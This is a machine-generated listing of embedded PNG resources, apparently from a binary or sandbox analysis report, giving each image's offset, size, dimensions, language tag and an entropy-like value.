                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36af200x89PNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36afb00x98PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006578947368421
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b0480x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b0e00x7dPNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.008
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3816e00xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3816200xbcPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0159574468085106
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37c5d80xa07PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004285157771718
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3740180x1de1PNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014380964832004
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x375e000x1bePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0246636771300448
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x375fc00x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3811e00x440PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010110294117647
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d4680x12ePNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0298013245033113
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37aa700x5b1PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0075497597803706
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37b0280x408PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0106589147286822
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37bca80x471PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009674582233949
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37c1200x4b7PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091135045567523
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37b4300x481PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0095403295750216
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37b8b80x3ecPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0109561752988048
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36e1300x452PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0099457504520795
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36e9280x414PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36e5880x39ePNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011879049676026
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36ed400x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3722900x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3724480xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3725380x1ae0PNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0015988372093023
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x376ef00xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x377a380x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3780480x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3798f80x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36fca00x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36f1d00xacbPNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039811798769454
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3818300xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3823f80xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37e2400x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37dca80x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d6b00x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d2300x237PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194003527336861
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37e8200x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3765000x4b6PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091210613598673
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3769b80x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36c7c80x5fePNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071707953063884
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36cdc80xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36dba00x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38ea080x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3913c80x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3910300x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38fdd00x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38bbf00x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38e6980x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38e2c80x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38cfa80x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3917480x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3941300x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x393d700x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x392af80x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3863000x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x388c800x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3889280x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3876a00x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3830280x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3832400x2e4PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148648648648648
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3836000x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x385f980x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x385c200x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3849b00x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3835280xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3944980x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x396f300x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x396b380x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3958300x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3890000x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38b8780x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38b5380x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38a3980x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3817880xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36df180x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36dc200x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d0480x16ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.030054644808743
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d1b80x73PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9826086956521739
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d5980x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37cfe00x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3803b00xcePNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0242718446601942
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3807a00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3804800x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3807080x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37fa400x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37f0a00x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37eda80x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x367ff80x1ffPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0215264187866928
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3681f80x1f7PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021868787276342
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3684880xb6PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.010989010989011
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3683f00x94PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0135135135135136
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3685400x3e6PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0110220440881763
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3689280x3e6PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0110220440881763
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x368d100x315PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0139416983523448
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3690280x259PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0183028286189684
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3694880x205PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0212765957446808
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3696900x176PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3692880x124PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136986301369864
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3693b00xd7PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3698080x28fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.016793893129771
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x369a980x225PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0200364298724955
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b6d00xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36c4a80x123PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0378006872852235
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b3600x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b2d80x83PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0076335877862594
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36ac580x12fPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0264026402640265
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36a7c80x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f3380x261PNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0180623973727423
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f1200x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39bd500x1b5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9931350114416476
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c0280x293PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0166919575113809
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39bf080x11aPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9716312056737588
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39ec400xdePNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.027027027027027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39dd580x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39e0e80x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39e4000x124PNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0308219178082192
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39e3500xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39e5280x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39db480x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f0280xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a07a00x9fPNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0125786163522013
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a06580x148PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0335365853658536
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39ed200xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39edd00x8bPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.014388489208633
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39ee600xa4PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39ef080x94PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0067567567567568
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39efa00x87PNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b5de80xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b5d200xc5PNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203045685279188
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b0b400xa54PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004160363086233
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a83f00x1edaPNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001392757660167
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3aa2d00x1cbPNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0239651416122004
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3aa4a00x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b58280x4f3PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0086819258089976
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b1a480x11aPNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024822695035461
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3aeff00x5afPNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0075601374570446
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3af5a00x3ffPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010752688172043
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b02080x461PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0098126672613739
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b06700x4ccPNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008957654723127
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3af9a00x474PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0096491228070175
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3afe180x3efPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0109235352532273
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a23c80x44aPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0100182149362478
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a2bb80x41fPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0104265402843602
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a28180x39bPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119176598049837
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a2fd80x4a1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009282700421941
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a65380x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a66f00xf9PNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.036144578313253
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a67f00x1bfaPNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001535883831332
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ab4700xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3abfb80x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ac5c80x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ade780x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a3f480x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a34800xac7PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039869517941282
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b5f480xa82PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004089219330855
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b69d00xac7PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039869517941282
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b27f00x5d3PNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073775989268947
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b22780x575PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078740157480315
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b1c880x5eaPNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0072655217965654
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b18200x222PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.02014652014652
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b2dc80x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3aa9e00x552PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0080763582966226
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3aaf380x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a08400x624PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006997455470738
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a0e680xf6fPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027841052898
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a1dd80x98PNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.013157894736842
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c15580x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c38a80x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c35100x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c29200xbeaPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036065573770492
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3beda80x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c11e80x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c0e180x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c01600xcb2PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033846153846153
